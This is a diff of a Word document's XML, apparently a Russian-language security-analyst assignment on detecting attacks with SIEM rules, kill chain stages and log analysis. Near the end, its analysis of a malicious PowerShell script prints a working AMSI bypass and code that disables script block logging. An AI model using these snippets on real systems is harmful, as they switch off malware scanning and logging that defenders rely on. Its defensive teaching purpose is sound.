-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>ProcDump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>Поиск файлов, связанных с инструментами дампа хэша, в системе (например, Mimikatz, ProcDump).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1448,23 +1260,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Уведомления о странных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>геолокациях</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> входа</w:t>
+        <w:t>Уведомления о странных геолокациях входа</w:t>
       </w:r>
       <w:r>
         <w:t>:</w:t>
@@ -1780,15 +1576,7 @@
         <w:t xml:space="preserve">.   </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Системы SIEM (Security Information </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Event Management) могут собирать и анализировать данные из различных источников:</w:t>
+        <w:t>Системы SIEM (Security Information and Event Management) могут собирать и анализировать данные из различных источников:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1843,39 +1631,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Проактивный поиск угроз (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Threat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Hunting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Проактивный поиск угроз (Threat Hunting)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2093,23 +1849,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">Если у вас есть журналы антивируса, какие правила </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>корреляции(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>сценарии обнаружения)вы можете предложить?</w:t>
+        <w:t>Если у вас есть журналы антивируса, какие правила корреляции(сценарии обнаружения)вы можете предложить?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2159,13 +1899,8 @@
         </w:rPr>
         <w:t xml:space="preserve">    Определение метрик обнаружения</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Установите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, какие коды событий и параметры логов можно использовать для детектирования атак. Например, это могут быть события о неудачных попытках входа или о запуске подозрительных процессов</w:t>
+      <w:r>
+        <w:t>: Установите, какие коды событий и параметры логов можно использовать для детектирования атак. Например, это могут быть события о неудачных попытках входа или о запуске подозрительных процессов</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2203,15 +1938,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    Создание правила корреляции</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: На</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> этом этапе формулируйте конкретные правила, например:</w:t>
+        <w:t xml:space="preserve">    Создание правила корреляции: На этом этапе формулируйте конкретные правила, например:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2225,21 +1952,8 @@
         </w:rPr>
         <w:t xml:space="preserve">    Правило для обнаружения использования дефолтных учетных записей</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Срабатывает</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> при входе под учетной записью с известным паролем (например, "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>")</w:t>
+      <w:r>
+        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "admin")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2253,13 +1967,8 @@
         </w:rPr>
         <w:t xml:space="preserve">    Правило для мониторинга изменений конфигурации антивируса</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Обнаруживает</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> изменения в параметрах запуска службы антивирусного ПО</w:t>
+      <w:r>
+        <w:t>: Обнаруживает изменения в параметрах запуска службы антивирусного ПО</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2318,13 +2027,8 @@
         </w:rPr>
         <w:t>Неудачные попытки входа</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> за 5 минут было более 5 неудачных попыток входа под одной учетной записью, создайте инцидент.</w:t>
+      <w:r>
+        <w:t>: Если за 5 минут было более 5 неудачных попыток входа под одной учетной записью, создайте инцидент.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2340,13 +2044,8 @@
         </w:rPr>
         <w:t>Запуск неизвестного процесса</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> зафиксировано событие запуска неизвестного исполняемого файла после нескольких неудачных попыток входа, это может указывать на атаку.</w:t>
+      <w:r>
+        <w:t>: Если зафиксировано событие запуска неизвестного исполняемого файла после нескольких неудачных попыток входа, это может указывать на атаку.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2405,23 +2104,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>6.3 На каком этапе атаки «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» находится этот случай?</w:t>
+        <w:t>6.3 На каком этапе атаки «kill chain» находится этот случай?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2718,35 +2401,7 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Этап атаки «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>kill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>chain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>»:</w:t>
+        <w:t>Этап атаки «kill chain»:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2771,23 +2426,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Exploitation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t>"Exploitation"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (эксплуатация) или </w:t>
@@ -2797,23 +2436,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Installation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t>"Installation"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (установка).</w:t>
@@ -2960,48 +2583,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">UDP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Snd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>: Это</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>датаграмм</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>UDP Snd: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских датаграмм).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3097,15 +2679,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Записи журнала делают запросы записей PTR (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pointer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
+        <w:t>Записи журнала делают запросы записей PTR (Pointer) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3251,49 +2825,35 @@
       <w:r>
         <w:t xml:space="preserve">1 и 10 сообщение с компьютера </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>kheirkhabarov</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>avp</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ru</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">о </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>создании(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>1) и доступе(10) дампа памяти.</w:t>
+        <w:t>о создании(1) и доступе(10) дампа памяти.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3348,32 +2908,17 @@
       <w:r>
         <w:t xml:space="preserve">это исполняемый файл(программа) удаленного доступа, и это событие создается каждый раз, когда используется </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>PsExec</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, поэтому потребуется дополнительный анализ событий, чтобы определить, являются ли они вредоносными или легитимными</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>т.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>к.возможный</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> вредоносный код </w:t>
+        <w:t xml:space="preserve">, т.к.возможный вредоносный код </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3449,21 +2994,14 @@
       <w:r>
         <w:t>-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ItemProperty</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">в </w:t>
+      <w:r>
+        <w:t xml:space="preserve">(в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3555,71 +3093,69 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Это скрипт </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Это скрипт PowerShell, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками PowerShell и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Проверка версии PowerShell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve"> powershell IF ($PSVersionTable.PSVersion.Major -ge 3) { Скрипт проверяет, является ли версия PowerShell 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Проверка версии </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Манипуляция параметрами групповой политики powershell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
@@ -3627,113 +3163,301 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
+        <w:t xml:space="preserve"> $GPF=[REF].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Изменение реестра powershell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов PowerShell, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Обход</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AMSI:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Эта</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>часть</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> IF ($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>PSVersionTable.PSVersion.Major</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>пытается</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>ge</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>обойти</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3) </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>{ Скрипт</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>интерфейс</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проверяет, является ли версия </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>сканирования</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>вредоносных</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2. </w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Манипуляция параметрами групповой политики </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        </w:rPr>
+        <w:t>программ</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (AMSI), </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>устанавливая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>поле</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>которое</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>указывает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>сбой</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>инициализации</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AMSI. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Инициализация веб-клиента powershell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -3743,35 +3467,36 @@
         <w:rPr>
